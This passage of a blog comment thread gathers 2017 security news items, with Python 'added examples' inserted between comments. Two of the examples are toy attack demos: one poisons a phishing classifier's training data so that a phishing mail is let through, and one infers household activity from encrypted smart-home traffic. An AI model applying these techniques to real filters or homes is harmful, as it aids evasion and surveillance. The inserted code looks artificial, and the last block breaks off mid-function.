    The group would be unusual in several respects, and thus requires an exemption from OpenJDK bylaws. Due to the sensitive nature of its work, membership in the group would be more selective, there would be a strict communication policy, and members or their employers would need to sign both a nondisclosure and a license agreement, said Mark Reinhold, chief architect of the Java platform group at Oracle

    Reply
  11. Tomi Engdahl says:

    Interesting story. True or not – hard to verify. Judge yourself:

    How the NSA identified Satoshi Nakamoto
    https://medium.com/@amuse/how-the-nsa-caught-satoshi-nakamoto-868affcef595

    The ‘creator’ of Bitcoin, Satoshi Nakamoto, is the world’s most elusive billionaire. Very few people outside of the Department of Homeland Security know Satoshi’s real name.

    Satoshi has taken great care to keep his identity secret employing the latest encryption and obfuscation methods in his communications. Despite these efforts (according to my source at the DHS) Satoshi Nakamoto gave investigators the only tool they needed to find him — his own words.

    Using stylometry one is able to compare texts to determine authorship of a particular work. Throughout the years Satoshi wrote thousands of posts and emails and most of which are publicly available. According to my source, the NSA was able to the use the ‘writer invariant’ method of stylometry to compare Satoshi’s ‘known’ writings with trillions of writing samples from people across the globe.

    The NSA then took bulk emails and texts collected from their mass surveillance efforts.

    The NSA’s proprietary software, bulk email collection ability, and computing power made it possible for them to conclusively identify Satoshi.

    The moral of the story? You can’t hide on the internet anymore. Your sentence structure and word use is MORE unique than your own fingerprint. If an organization, like the NSA, wants to find you they will.

    Reply
  12. Tomi Engdahl says:

    Ethical hackers spoof buggy sales system to buy a MacBook for $1
    https://thenextweb.com/security/2017/08/28/macbook-dollar-pos-bug/#.tnw_CxI6LYbl

    Apple retails its MacBooks at notoriously high rates, but hackers might have found a way to bend the system – and possibly bring the price down to a measly dollar.

    Researchers from software security firm ERPScan have discovered a vulnerability in point-of-sale terminals developed by SAP and Oracle. If exploited, the flaw could grant attackers authorization to tap into the back-end system and tamper with prices and discounts for any item.

    The system’s Xpress server suffered from a slew of missing authorization measures. What was particularly jarring about this is that, in addition to access to credit card data, it also enabled attackers to gain unfettered control over the server.

    “Broadly speaking, it’s not a problem of SAP. Many POS systems have similar architecture and thus same vulnerabilities,” said Chastuhin.

    “The connections between POS workstation and the store server […] [often] lack the basics of cybersecurity – authorization procedures and encryption – and nobody cares about it. So, once an attacker is in the network, he or she gains full control of the system.”

    Following the second report, SAP has now successfully patched both vulnerabilities.

    Reply
  13. Tomi Engdahl says:

    India has blocked the Internet Archive nationwide and won’t say why [Update]
    https://thenextweb.com/in/2017/08/09/india-has-blocked-the-internet-archive-nationwide-and-wont-say-why/#.tnw_WyXQGanX

    The Indian government is no stranger to cutting off access to websites for its citizens as and when it sees fit, and to doing so without notifying users. While it’s previously obstructed access to porn sites, GitHub and WordPress.com, its latest stunt is perhaps the most audacious to date: blocking the Internet Archive.

    Reply
  14. Tomi Engdahl says:

    Google made a tiny error and it broke half the internet in Japan
    https://thenextweb.com/google/2017/08/28/google-japan-internet-blackout/

    When an ISP makes a tiny mistake, the outcome could have immense repercussions – and this is precisely what happened in Japan last week.

    Last Friday, half the internet in the country suddenly shut down after the Big G accidentally botched a Border Gateway Protocol (BGP) around noon local time. The origin of the blunder was a number of falsely announced peer prefixes sent to Verizon.

    Shortly after the faulty rerouting request went through, numerous users of internet providers NTT Communications and KDDI Corp. were unable to connect to the web – or experienced significantly slower surfing speeds.

    Google has since owned up to its mistake, assuming full responsibility for its role in the blackout.

    “We set wrong information for the network and, as a result, problems occurred. We modified the information to the correct one within eight minutes,” a company spokesperson told The Asahi Shimbun. “We apologize for causing inconvenience and anxieties.”

    Reply
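Both comments on the Japan outage (the BGPmon analysis above and this one) describe the same failure: a peer announced a full table and the other side accepted it. As an added example, not BGPmon’s, Google’s or Verizon’s code, the following simulates the inbound policy that contains such a leak on the receiving side: a per-peer prefix-list that rejects unregistered prefixes and more-specifics, an origin check that rejects third-party networks reached through the peer, and a max-prefix limit that tears the session down when the peer suddenly sends far more routes than it ever should. AS numbers and prefixes come from documentation ranges, except 171.5.0.0/17 and AS45629, which are the leaked example quoted above; the max-prefix counter counts every route received, which is an assumption, since routers offer both “received” and “accepted” variants.

```python
"""Inbound policy a peer should apply on a settlement-free peering session.

Added example, not BGPmon's, Google's or Verizon's code. It models the
controls that contain a route leak: a per-peer prefix-list (only prefixes the
peer is registered to originate, nothing more specific than /24), an origin
check against transit through the peer, and a max-prefix limit. AS numbers and
prefixes are from documentation ranges except 171.5.0.0/17 and AS45629, the
leaked example quoted on this page. Counting every received route against the
limit is an assumption of this model.
"""
import ipaddress

PEER_AS = 64496                                  # the peer (a large content network in the story)
PEER_PREFIXES = ["203.0.113.0/24", "198.51.100.0/22"]   # what the peer is registered to originate
MAX_PREFIX = 500                                 # a content peer announces hundreds, not 135,000
MAX_LENGTH = 24                                  # traffic-engineering more-specifics stay out of the DFZ


def rejection_reason(prefix, as_path, allowed):
    """Return None if the route passes the peer policy, else why it was rejected."""
    net = ipaddress.ip_network(prefix)
    if as_path[0] != PEER_AS:
        return "first AS is not the peer"
    if as_path[-1] != PEER_AS:
        return "origin AS%d reached through the peer (transit leak)" % as_path[-1]
    if net.prefixlen > MAX_LENGTH:
        return "more specific than /%d" % MAX_LENGTH
    if not any(net.subnet_of(a) for a in allowed):
        return "not in peer prefix-list"
    return None


def evaluate_session(announcements, allowed=PEER_PREFIXES, max_prefix=MAX_PREFIX):
    """Apply the policy to (prefix, as_path) announcements in arrival order."""
    allowed_nets = [ipaddress.ip_network(p) for p in allowed]
    accepted, rejected, received = [], [], 0
    session_down = False
    for prefix, as_path in announcements:
        received += 1
        if received > max_prefix:
            session_down = True               # max-prefix exceeded: tear down, take nothing more
            break
        reason = rejection_reason(prefix, as_path, allowed_nets)
        if reason:
            rejected.append((prefix, reason))
        else:
            accepted.append(prefix)
    return {"accepted": accepted, "rejected": rejected, "session_down": session_down}


def constructed_announcements(leak_size=600):
    """Constructed update stream: the peer's own routes, a few bad ones, then a 'full table' leak."""
    anns = [
        ("203.0.113.0/24", [PEER_AS]),                 # legitimate
        ("198.51.100.0/22", [PEER_AS]),                # legitimate
        ("203.0.113.0/25", [PEER_AS]),                 # more-specific meant for traffic engineering
        ("192.0.2.0/24", [PEER_AS]),                   # not registered to the peer
        ("171.5.0.0/17", [PEER_AS, 45629]),            # third party behind the peer: leak
    ]
    for i in range(leak_size):                         # the rest of the leaked table
        anns.append(("10.%d.%d.0/24" % (i // 256, i % 256), [PEER_AS, 64500 + i % 10]))
    return anns


if __name__ == "__main__":
    result = evaluate_session(constructed_announcements())
    print(len(result["accepted"]), "accepted,", len(result["rejected"]), "rejected,",
          "session down:", result["session_down"])
```

The prefix-list alone already rejects every leaked route, so the leak would not have propagated; the max-prefix limit is the second, independent layer that protects the router itself from being handed 135,000 unexpected updates, and it trips here long before the constructed leak finishes.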
  15. Tomi Engdahl says:

    Thousands of ‘innocent’ Android apps watch videos and view ads behind your back, says report
    https://www.cnbc.com/2017/08/28/android-apps-use-phone-wiithout-permission-ad-fraud-ezanga-report.html

    A recent study by eZanga showed over 1,300 Android apps contained one specific malware that makes people’s phones view ads and videos without their knowledge.
    After the study, eZanga said the number ballooned to more than 6,000 apps.
    It could cause advertisers up to $2,000,000 to $10,000,000 daily in fraudulent ad traffic, eZanga said.

    The report estimated the top apps using this SDK module, one of which could have been downloaded up to 1 million times in the Google Play store, could cost advertisers anywhere between $2,000,000 to $10,000,000 daily in fraudulent ad traffic.

    On June 7, they found 312 apps with the SDK module — 53 of which were in the Google Play store. A week after, the SDK module was in 750 apps, 300 of which were in the store. Two days after that, the number ballooned to 1,330 apps, and 317 were available for purchase in the store.

    The majority of the apps were live wallpapers, or free backgrounds for Android phones that featured cute cats, nature scenes or other cool effects. Others were free versions of popular apps like File Explorer or other photo-editing software.

    While Apple formally approves every app that goes into its store, Android developers can upload directly to the Google Play store and have people download their apps almost immediately, eZanga CEO Rich Kahn explained.

    A Google spokesperson said all apps submitted to Google Play are automatically scanned for potentially malicious code and spammy developer accounts before they are published.

    Google Play did remove all the apps eZanga named in the study within a few weeks, Kahn said.

    POTENTIAL $3 BILLION PER YEAR THREAT
    https://cdn2.hubspot.net/hubfs/2215919/Longform_Content/Anura%20Mobile%20App%20Fraud%20Final%207-10-17/anura-mobile-app-fraud-2_Final.pdf?t=1503687425079

    Bad bots are malicious programs and software applications that run automated tasks unbeknownst
    to those affected. They usually try to simulate human activity and are financially motivated

    OVER $6.5 BILLION WILL BE LOST TO BOTS IN 2017

    Anura® has detected click attempts made from a variety of apps available on the Google Play Store.
    Anura® developers isolated two apps – Lovely Rose and Oriental Beauty – and installed them on a
    mobile device, monitoring activity over a 24-hour time period.
    During this time frame, the device remained untouched and unused, in sleep mode. The click logs
    however indicated a collective 3,061 requests for an ad of which ads were potentially granted 169
    times. Brands receiving these clicks include the likes of Snapchat and Wendy’s but the issue lies in
    how they received the clicks. The phone was not in use so who clicked the ad? A bot.

    How Do These Apps Commit Fraud
    Understanding how these apps have gone undetected for so long is key to understanding how to
    stop it.

    Once the infected application is installed (or if already installed, once the phone is turned on), it
    waits 6 minutes before initiating its script. Once the script is initiated, the sequence starts and
    repeats this pattern every hour.

    This script is written in such a way that it generates a randomized SubID, ClickID, and keyword. To do so, it makes a call to the PHP document to obtain a list of keywords and zero click URLs, which tells the bot where to perform fraudulent “clicks.”

    Once the SubID, ClickID, and keyword are generated and ad feeds obtained, this script runs in what is
    called a “zero click environment,” loading a pop-under in a custom, although non-viewable web view.
    With the zero click model “the user” or bot is forced through to the advertiser’s site.

    To stay under the radar, the bot generates page views and clicks on a site by following a scripted pattern.
    The code is even written to mimic a finger lifting off the phone post click.

    Security Concerns with the OS
    When you touch a screen on a device, you are touching a piece of hardware. That hardware triggers
    an event to the OS, which sends the signal to the app, indicating that some event took place – in
    this case a finger “touching” the screen. However, this script is able to mimic the event that the OS
    would send to the app, telling the app that this event took place. It may be possible that this is a security hole that can be patched to prevent this event from being triggered by anything other than the hardware.

    Reply
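The Anura write-up above gives the bot a recognisable cadence: the first ad request about six minutes after install or boot, a repeat every hour, and “clicks” from a device nobody is touching. As an added example (not eZanga’s or Anura’s code, and not part of the original comment), here is that detection logic in Python, run over a constructed device event log. The log layout (epoch seconds, device id, event name, detail), the event names and the time thresholds are assumptions.

```python
"""Flag devices whose ad clicks follow the idle, hourly pattern described above.

Added example; not code from eZanga or Anura. Log format is an assumption:
one event per line, "epoch_seconds,device_id,event,detail".
"""
from collections import defaultdict

IDLE_WINDOW = 300        # seconds without a touch before a click counts as "idle"
PERIOD = 3600            # the report describes an hourly repeat
PERIOD_TOLERANCE = 120   # +/- seconds still counted as the same cadence

# Constructed log: dev-A is used by a person, dev-B sits asleep with a
# fraudulent live wallpaper installed (ad requests start 6 min after boot).
SAMPLE_LOG = """\
1000,dev-A,touch,down
1001,dev-A,ad_request,network=foo
1002,dev-A,ad_click,brand=foo
1200,dev-B,boot,-
1560,dev-B,ad_request,sub=abc123
1561,dev-B,ad_click,brand=snap
5160,dev-B,ad_request,sub=9f1e2c
5161,dev-B,ad_click,brand=wendys
8760,dev-B,ad_request,sub=00ab77
8761,dev-B,ad_click,brand=snap
"""


def parse(log_text):
    """Parse the constructed log into sorted (ts, device, event, detail) tuples."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, dev, ev, detail = line.split(",", 3)
        events.append((int(ts), dev, ev, detail))
    events.sort()
    return events


def idle_clicks(events, idle_window=IDLE_WINDOW):
    """Return {device: [click timestamps]} for clicks with no touch in idle_window."""
    last_touch = {}
    out = defaultdict(list)
    for ts, dev, ev, _ in events:
        if ev == "touch":
            last_touch[dev] = ts
        elif ev == "ad_click":
            t = last_touch.get(dev)
            if t is None or ts - t > idle_window:
                out[dev].append(ts)
    return dict(out)


def periodic(timestamps, period=PERIOD, tol=PERIOD_TOLERANCE):
    """True if every gap between consecutive timestamps is within tol of period."""
    if len(timestamps) < 3:
        return False
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    return all(abs(g - period) <= tol for g in gaps)


def boot_delay(events, dev):
    """Seconds from the device's boot event to its first ad request, or None."""
    boot = None
    for ts, d, ev, _ in events:
        if d != dev:
            continue
        if ev == "boot":
            boot = ts
        elif ev == "ad_request" and boot is not None:
            return ts - boot
    return None


def suspicious_devices(log_text):
    """Devices whose idle clicks recur on an hourly cadence, with their boot delay."""
    events = parse(log_text)
    report = {}
    for dev, clicks in idle_clicks(events).items():
        if periodic(clicks):
            report[dev] = {"idle_clicks": len(clicks),
                           "boot_delay": boot_delay(events, dev)}
    return report


if __name__ == "__main__":
    print(suspicious_devices(SAMPLE_LOG))
```

On real telemetry the touch events would come from the OS input layer and the ad requests from a network log; the point of keeping both in one stream is that a click with no preceding touch is the strongest single signal the report gives.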
  16. Tomi Engdahl says:

    Why cybercriminals like AI as much as cyberdefenders do
    https://www.americanbanker.com/news/why-cybercriminals-like-ai-as-much-as-cyber-defenders-do

    Artificial intelligence may escalate a long-running arms race between financial institutions and cybercriminals.

    The technology is helping banks’ cybersecurity teams detect and deal with breaches. Unfortunately, AI also creates new vulnerabilities in systems, since leaving machines in charge opens up opportunities for mistakes and manipulation. Further, AI helps attackers do their jobs more efficiently. For example, in attacks carried out last year, the writers of the Petya malware used AI to identify vulnerabilities and scan millions of ports in seconds to find the holes.

    “AI is a hammer that can be used for good or bad,” said Jim Fox, a partner, principal and cybersecurity and privacy assurance leader at PwC. “And if your adversaries have a hammer, you’d better have one, too.”

    In the right hands, this mighty hammer can do a lot of good. Artificial intelligence software can monitor all network activity and quickly discern odd patterns that could indicate foul play, even if such patterns haven’t been flagged before. It can learn over time to discern truly suspicious behavior from normal patterns.

    “Most of the threats we’re dealing with now aren’t solved by traditional tools like signature-based antivirus [software], or anything that has a signature,” Shaffer said. “The real threat actors know how to get by them. What you’re really interested in is trying to figure out what the smart actors are doing. That’s where machine learning and AI come into play.”

    Shaffer installed an AI-based system from Vectra that watches all network traffic at Greenhill. It spots anomalies that standard intrusion detection software can’t see, he said. (Other companies offering AI-based or enhanced cybersecurity products include IBM, Darktrace, FireEye and McAfee.)

    “That to a lot of systems would look like somebody doing a scan on your network,” Shaffer said.

    The dark side of AI

    The U.S. intelligence community has raised a litany of concerns about the use of artificial intelligence: that it increases vulnerabilities to cyberattacks, raises difficulties in attribution, facilitates the advances of foreign weapon and intelligence systems through technology, increases the risks of accidents and substantially increases liability for the private sector, including financial institutions.

    “What the U.S. government has said is if everything is run by machines and there’s no more human intervention, then AI is our total law enforcement, our total gatekeeper of everything,” said Christine Duhaime, an attorney at Duhaime Law, based in Toronto. “So the more we get interconnected — the more there are systems deciding what’s safe, what’s good, what’s bad — the more it’s going to be vulnerable because we’re counting on our systems to be smarter and better than the hacker in another country who wants to do us harm.”

    The government has also said AI could increase the risks of accidents and substantially increase liability for the private sector including financial institutions, she pointed out. In other words, the more systems decide things on their own, the greater the likelihood they’ll make a massive mistake that’s really hard to undo.

    How criminals use AI

    “The reason we have so much financial cybercrime is it’s a very efficient way to steal money with a lower risk of arrest and prosecution,” Grobman said. “The reason cybercriminals don’t knock over banks as much as they use malware or other cyber techniques is because the technology lends itself to providing better outcomes.”

    “We’re looking at: how will bad actors attempt to poison models?” he said. For instance, crooks might introduce specially crafted data into the data sets the models look at that will make the models easier to evade in the future.

    Bad actors are also starting to use AI to automate formerly human tasks, Grobman said. For instance, AI can generate spear phishing emails tailored to an individual through tidbits found through email or social media searches.

    “Instead of requiring humans to tailor content to the individual, they can en masse create content that is tailored to individuals and thus can have a higher victim conversion rate,” he said.

    Grobman has mixed feelings about the government’s warnings about AI.

    Reply
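Grobman’s point about poisoning, “specially crafted data into the data sets the models look at that will make the models easier to evade in the future,” is easier to see with a toy classifier. As an added example (not code from the article, McAfee or PwC), the Python below trains a small naive Bayes phishing filter on a constructed corpus, shows that a phishing message is caught, then adds a handful of attacker-supplied messages labelled benign and retrains: the same phishing message now passes. The corpus, the labels and the tokenisation are all constructed for the example.

```python
"""Training-data poisoning against a simple spam/phishing classifier.

Added example; not code from the article or the vendors it quotes. The
multinomial naive Bayes is written inline so the effect is fully visible.
"""
import math
from collections import Counter


def tokenize(text):
    return text.lower().split()


def train(samples):
    """samples: list of (text, label). Returns a model usable by classify()."""
    docs = Counter()
    words = {"spam": Counter(), "ham": Counter()}
    for text, label in samples:
        docs[label] += 1
        words[label].update(tokenize(text))
    vocab = set(words["spam"]) | set(words["ham"])
    return {"docs": docs, "words": words, "vocab": vocab}


def log_posterior(model, text, label):
    docs, words, vocab = model["docs"], model["words"], model["vocab"]
    lp = math.log(docs[label] / sum(docs.values()))        # class prior
    n = sum(words[label].values())
    for tok in tokenize(text):
        # Laplace smoothing so an unseen token does not zero the whole product
        lp += math.log((words[label][tok] + 1) / (n + len(vocab)))
    return lp


def classify(model, text):
    spam, ham = log_posterior(model, text, "spam"), log_posterior(model, text, "ham")
    return "spam" if spam > ham else "ham"


# Constructed training corpus.
CLEAN = [
    ("urgent verify your account password now", "spam"),
    ("your account is locked verify password immediately", "spam"),
    ("claim your prize click now", "spam"),
    ("meeting moved to thursday agenda attached", "ham"),
    ("lunch tomorrow with the finance team", "ham"),
    ("quarterly report draft for review", "ham"),
]
ATTACK = "urgent verify your account password now"

# Poison: messages the attacker gets labelled "ham" (for instance by mailing
# them to an address whose traffic is auto-labelled benign), each stuffed
# with the tokens of the phishing mail the attacker intends to send later.
POISON = [("agenda attached urgent verify your account password now", "ham")] * 4


def poisoning_demo():
    """Classify the attack mail before and after the poisoned samples are added."""
    before = classify(train(CLEAN), ATTACK)
    after = classify(train(CLEAN + POISON), ATTACK)
    return {"before": before, "after": after}


if __name__ == "__main__":
    print(poisoning_demo())
```

Four poisoned samples are enough here because the corpus is tiny; the defensive lesson is the same at scale: anything that feeds labels back into training (user “not spam” buttons, auto-labelled honeypot traffic) is an input the attacker can write to.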
  17. Tomi Engdahl says:

    Rare WW2 encryption machine, “Hitler Mill”, found in Bavarian forest
    http://scienceblogs.de/klausis-krypto-kolumne/2017/08/19/rare-ww2-encryption-machine-hitler-mill-found-in-bavarian-forest/

    The SG-41, also known as Hitler Mill, was the successor of the Enigma encryption machine. Detectorists have now found a specimen in a Bavarian forest.

    Reply
  18. Tomi Engdahl says:

    Internet providers could easily snoop on your smart home
    https://techcrunch.com/2017/08/28/study-tracks-what-smart-home-activity-can-be-seen-by-internet-providers/

    We’ve mostly moved past the point where our Internet of Things devices leak private information to anyone watching via unsecured connections, but that doesn’t mean you can stop being afraid. Never, ever stop being afraid. To top up your paranoia reserves, a new study finds that internet providers can, if they so choose, monitor all kinds of things from your smart home’s traitorous metadata.

    The paper, from a team at Princeton’s computer science school led by grad student Noah Apthorpe, gets straight to the point: “we demonstrate that an ISP or other network observer can infer privacy sensitive in-home activities by analyzing internet traffic from smart homes containing commercially available IoT devices even when the devices use encryption.”

    It’s a pretty straightforward attack: the IoT devices often identify themselves voluntarily, usually by connecting to specific domains or URLs. Even if they didn’t, there are simple ways of profiling them based on observation and some known data. The researchers demonstrated this by showing that various devices show distinct patterns of data transmission:

    Spying on the Smart Home: Privacy Attacks and Defenses on Encrypted IoT Traffic
    https://arxiv.org/abs/1708.05044

    Reply
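The two steps the TechCrunch summary gives, identify the device from the hostnames it contacts, then read activity off its send rate, can be shown on flow metadata alone. As an added example (not the Princeton team’s code, and not part of the original comment), the Python below takes constructed per-flow records of the kind an ISP sees for encrypted traffic (timestamp, client MAC, server name, bytes sent) and produces an activity timeline without decrypting anything. The hostname-to-device mapping and the per-device thresholds are assumptions.

```python
"""Infer in-home activity from encrypted smart-home traffic metadata.

Added example; not the paper's code. Flow records are constructed and the
record layout "epoch_seconds,client_mac,server_name,bytes_out" is assumed.
"""
from collections import defaultdict

# Assumed fingerprints: a device gives itself away by the server names it resolves.
DEVICE_BY_HOSTNAME = {
    "camera-upload.example.net": "camera",
    "api.plug.example.com": "smart plug",
    "hub.sleepmonitor.example.org": "sleep monitor",
}
# Assumed per-device idle baseline in bytes per minute; above this it is "in use".
ACTIVE_THRESHOLD = {"camera": 50_000, "smart plug": 500, "sleep monitor": 2_000}

# Constructed flows: a camera that bursts when it records, a plug that
# phones home once when toggled.
SAMPLE_FLOWS = """\
0,aa:bb:cc:00:00:01,camera-upload.example.net,4000
60,aa:bb:cc:00:00:01,camera-upload.example.net,4100
120,aa:bb:cc:00:00:01,camera-upload.example.net,900000
180,aa:bb:cc:00:00:01,camera-upload.example.net,880000
240,aa:bb:cc:00:00:01,camera-upload.example.net,4200
0,aa:bb:cc:00:00:02,api.plug.example.com,120
300,aa:bb:cc:00:00:02,api.plug.example.com,3100
"""


def parse_flows(text):
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, mac, host, nbytes = line.split(",")
        flows.append((int(ts), mac, host, int(nbytes)))
    return flows


def identify_devices(flows):
    """Map each client MAC to a device type using only the server names it contacts."""
    devices = {}
    for _, mac, host, _ in flows:
        kind = DEVICE_BY_HOSTNAME.get(host)
        if kind:
            devices[mac] = kind
    return devices


def bytes_per_minute(flows):
    """Aggregate outbound bytes into (minute, mac) buckets."""
    buckets = defaultdict(int)
    for ts, mac, _, nbytes in flows:
        buckets[(ts // 60, mac)] += nbytes
    return buckets


def infer_activity(text):
    """Return [(minute, device_type, bytes)] for minutes where a device exceeds its baseline."""
    flows = parse_flows(text)
    devices = identify_devices(flows)
    events = []
    for (minute, mac), total in sorted(bytes_per_minute(flows).items()):
        kind = devices.get(mac)
        if kind and total > ACTIVE_THRESHOLD[kind]:
            events.append((minute, kind, total))
    return events


if __name__ == "__main__":
    for minute, kind, total in infer_activity(SAMPLE_FLOWS):
        print(f"minute {minute}: {kind} active ({total} bytes out)")
```

The paper’s defences follow directly from what this code needs: padding or shaping traffic to a constant rate breaks the threshold step, and routing through a VPN or proxy removes the server names the first step relies on.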
  19. Tomi Engdahl says:

    Ransomware behind NHS Lanarkshire cyber-attack
    http://www.bbc.com/news/uk-scotland-glasgow-west-41076591

    It has been confirmed that ransomware was behind a cyber-attack on a Scottish health board which led to some appointments and procedures being cancelled.

    NHS Lanarkshire said it was a new variant of Bitpaymer that infected its network on Friday.

    The board said staff worked over the weekend to reinstate IT systems.

    Work is ongoing to establish how the malware was able to infiltrate the network without being detected.

    Ransomware is a particularly destructive form of malware that catastrophically struck the NHS earlier this year.

    While this new infection is not the notorious Wannacry variation, which caused global chaos, it is yet another demonstration of how disruptive ransomware can be.

    What it does is encrypt the data it finds on a host computer so that it can no longer be accessed, and then demands payment, often in Bitcoin, for its release.

    Experts recommend resorting to back-up files rather than paying the ransom itself as there’s no guarantee that the criminals behind it will keep to their word – but there are many examples of cases where individuals and organisations have chosen to part with their cash.

    The best defence is to keep software updated and use anti-virus protection but it can be difficult for large organisations like the NHS to implement this en-masse, when complicated, life-saving equipment is running off a network that may not adjust well to even minor tweaks.

    A spokesman added: “Our security software and systems were up to date with the latest signature files, but as this was a new malware variant the latest security software was unable to detect it.

    Reply
  20. Tomi Engdahl says:

    Stormfront: ‘murder capital of internet’ pulled offline after civil rights action
    https://www.theguardian.com/technology/2017/aug/29/stormfront-neo-nazi-hate-site-murder-internet-pulled-offline-web-com-civil-rights-action

    Web.com pulls support for one of the oldest and largest neo-nazi hate sites following campaign by Lawyers’ Committee for Civil Rights Under Law

    One of the oldest and largest neo-nazi sites on the internet, the white supremacist chatroom Stormfront, has been thrown off the open web by its hosting provider.
    Stormfront has been described by the anti-hate group Southern Poverty Law Center as the “murder capital of the internet”. The group pointed out that “registered Stormfront users have been disproportionately responsible for some of the most lethal hate crimes and mass killings since the site was put up in 1995. In the past five years alone, Stormfront members have murdered close to 100 people.”

    As of Tuesday morning, Stormfront.org was unavailable, with the site’s domain registry recording that its hosting provider Network Solutions had issued a “hold” on the address.

    Stormfront’s removal comes a week after a letter, informing Network Solutions’ parent company Web.com of the neo-nazi site’s infractions of its usage policy, was sent by the Lawyers’ Committee for Civil Rights Under Law, a civil rights organisation formed at the request of John F Kennedy in 1963.

    The move follows the downfall of the Daily Stormer, a far-right news site which was dropped by multiple service providers after it published an article smearing the victim of a far-right terrorist attack in Charlottesville, Virginia. Eventually, the site was forced to move to the so-called dark web due to the lack of companies willing to work with it publicly.

    Reply
  21. Tomi Engdahl says:

    How to build a cybersecurity team
    https://www.cio.com/article/3219371/leadership-management/how-to-build-a-cybersecurity-team.html

    Building a cybersecurity team to address growing security threats can be challenging. Learn how some companies are tackling the issue.

    Cybersecurity professionals are bracing for continued attacks this year, effectively boosting their budgets by an average of 21%, according to the 2017 Cybersecurity Trends Report published by the National Center for the Midmarket.

    These cybersecurity professionals are focused specifically on cloud infrastructure, training and educating end users, and securing mobile devices.

    While concerns around cybersecurity are high, more than half of midmarket companies operate with limited to no strategy at all.

    Adding to the issue is the fact that cybersecurity is ever changing, according to Brian Hill of Computer Forensic Services. Technology offers convenience, but “every time we gain convenience, we give up something in security,” he said.

    Security is everyone’s business

    Following the attack, information security officers were strategically placed in critical organizations across the campus’s centralized IT division.

    “We’re of the opinion that security isn’t my job; it’s everyone’s job,” Bates said.

    Staff up cybersecurity teams from the inside

    At Boston-based MathWorks, IT director Jim Habeeb had only a part-time security team composed of networking specialists and various IT staffers. He sat down with the CFO and president, who now sits on the company’s security advisory team, to persuade them to hire a full-time chief information security officer (CISO) who could then help develop a hiring plan.

    After advertising for positions to build the security team, Habeeb opted to post the positions internally.

    “Highly skilled staff require a premium salary, and you want to be fair to your internal staff to expand their skills,” he explained. “When you hire from the outside, it can be hard to get someone who wants to hit the ground running in the best interest of the company rather than doing what they already know or are familiar with doing.”

    The team conducted a vulnerability scan of the company’s network environment and examined the perimeter for gaping holes. It then worked with risk management and legal counsel to prioritize what information to protect and what’s risky enough to ignore.

    Reply
  22. Tomi Engdahl says:

    Standard sets specifications for securing the physical network
    http://www.cablinginstall.com/articles/print/volume-25/issue-8/features/installation/standard-sets-specifications-for-securing-the-physical-network.html?cmpid=enl_cim_cim_data_center_newsletter_2017-08-28

    Published in February 2016, the ANSI/TIA-5017 Telecommunications Physical Network Standard covers the security of telecommunications cables, pathways, spaces, and other elements of the physical infrastructure, according to the Telecommunications Industry Association (TIA). The standard “includes design guidelines, installation practices, administration, and management,” the association continues. “This standard addresses guidelines for new construction as well as renovation of existing buildings. The standard also provides installation guidelines for implementing security cabling systems for premises security systems with an integrated security approach.”

    Sections of the standard cover security planning and risk assessment, design and installation guidelines, other guidelines and recommendations, physical network security guidelines, intelligent building systems for security, and administration considerations for security. It recognizes three levels of cabling infrastructure security: SL1 (basic security installation), SL2 (tamper-resistant installation), and SL3 (critical security installation).

    Reply
  23. Tomi Engdahl says:

    PoC Released for Dangerous iOS Kernel Exploit
    http://www.securityweek.com/poc-released-dangerous-ios-kernel-exploit

    Proof-of-concept (PoC) code has been released for recently patched iOS vulnerabilities that can be chained to take full control of a mobile device. The flaws could also be useful for a jailbreak, according to the researcher who found them.

    iOS 10.3.2, which Apple released in mid-May, patches seven AVEVideoEncoder vulnerabilities and one IOSurface flaw discovered by Adam Donenfeld of mobile security firm Zimperium. The security holes, which Apple says can be used by an application to gain kernel privileges, are believed to affect all prior versions of the iOS operating system.

    The vulnerabilities are tracked as CVE-2017-6979, CVE-2017-6989, CVE-2017-6994, CVE-2017-6995, CVE-2017-6996, CVE-2017-6997, CVE-2017-6998 and CVE-2017-6999. The bugs were discovered between January 24 and March 20, when they were reported to Apple.

    Reply
  24. Tomi Engdahl says:

    Google Introduces App Engine Firewall
    http://www.securityweek.com/google-introduces-app-engine-firewall

    Google on Thursday informed cloud platform customers that the beta release of its App Engine firewall is available for testing.

    The Google App Engine firewall allows developers and administrators to easily allow or block traffic from specified IP addresses by defining a set of rules and ordering them based on priority.

    Hosting an application in the cloud has many benefits, but unwanted traffic can have a negative impact on workloads and it can result in significant costs.

    According to Google, the App Engine firewall addresses this problem by returning an HTTP 403 Forbidden response to requests from denied IP addresses before they hit the application.

    “App Engine firewall replaces the need for a code-based solution within your app that still allows requests in, but which can cost you resources and still expose your app,” explained Lorne Kligerman, product manager at Google.

    Reply
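The one thing that bites people with priority-ordered allow/deny lists is shadowing: a broad rule with a lower number silently covers a narrower rule behind it. As an added example (not Google’s code, and it makes no API calls), the Python below models the evaluation the article describes, lowest priority number first, first match wins, a catch-all default rule last, and includes a small check that reports rules which can never match. The rule sets are constructed; the evaluation order and the default rule’s priority value are taken from Google’s published description of the feature.

```python
"""Model of priority-ordered IP allow/deny rules, as in the App Engine firewall.

Added example; not Google's code. Evaluation order (lowest priority number
first, first match wins, catch-all default last) follows Google's published
description; the rules below are constructed.
"""
import ipaddress

DEFAULT_PRIORITY = 2147483647  # priority of the catch-all default rule


def make_rule(priority, action, source_range, description=""):
    assert action in ("allow", "deny")
    return {"priority": priority, "action": action,
            "source_range": ipaddress.ip_network(source_range, strict=False),
            "description": description}


def evaluate(rules, client_ip):
    """Return (http_status, matching_rule): 403 for deny, 200 (request reaches the app) for allow."""
    ip = ipaddress.ip_address(client_ip)
    for rule in sorted(rules, key=lambda r: r["priority"]):
        net = rule["source_range"]
        if ip.version == net.version and ip in net:
            return (403, rule) if rule["action"] == "deny" else (200, rule)
    raise ValueError("no catch-all rule matched; always include the default rule")


DEFAULT_RULE = make_rule(DEFAULT_PRIORITY, "allow", "0.0.0.0/0", "default")

# Intended to block one scanner inside the office range, but the broad allow
# has the lower number, so the deny never runs and the scanner gets through.
SHADOWED = [
    make_rule(100, "allow", "198.51.100.0/24", "office range"),
    make_rule(200, "deny", "198.51.100.77/32", "scanner inside office range"),
    DEFAULT_RULE,
]

# Corrected: most specific rule first, then the allow, then deny everything else.
CORRECTED = [
    make_rule(100, "deny", "198.51.100.77/32", "scanner inside office range"),
    make_rule(200, "allow", "198.51.100.0/24", "office range"),
    make_rule(300, "deny", "0.0.0.0/0", "block everything else"),
    DEFAULT_RULE,
]


def shadowed_rules(rules):
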